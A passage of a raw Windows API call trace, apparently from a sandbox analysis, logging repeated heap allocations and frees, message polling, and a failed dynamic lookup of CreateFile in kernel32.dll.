dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.356] CloseHandle (hObject=0x128) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.357] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.357] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.359] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.359] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.359] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.359] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbf8 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.360] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.362] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.364] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8899d0 [0033.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8899d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.365] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0033.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.365] RtlAllocateHeap 